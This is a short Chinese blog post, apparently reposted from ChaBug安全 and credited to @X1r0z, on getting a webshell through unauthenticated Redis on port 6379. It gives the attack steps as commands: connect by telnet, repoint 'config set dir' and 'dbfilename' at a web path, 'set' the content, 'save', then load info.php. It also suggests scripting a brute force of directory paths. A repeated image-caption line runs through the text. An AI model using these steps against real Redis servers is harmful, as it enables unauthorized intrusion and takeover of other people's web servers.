开学了,文章更新会慢,见谅。
@X1r0z原文

利用 redis 获取 webshell

端口 6379

server
redis 未授权 getshell-ChaBug安全
telnet 连接

redis 配置里有 dir 和 dbfilename

dir 存储路径 dbfilename 存储文件名
redis 未授权 getshell-ChaBug安全
save 保存
redis 未授权 getshell-ChaBug安全
写 webshell

config set dir 路径
config dbfilename 文件名
set web 内容
save
redis 未授权 getshell-ChaBug安全
访问 info.php
redis 未授权 getshell-ChaBug安全
另外 config set 不存在的 dir 会报错
redis 未授权 getshell-ChaBug安全
可以写个脚本爆破路径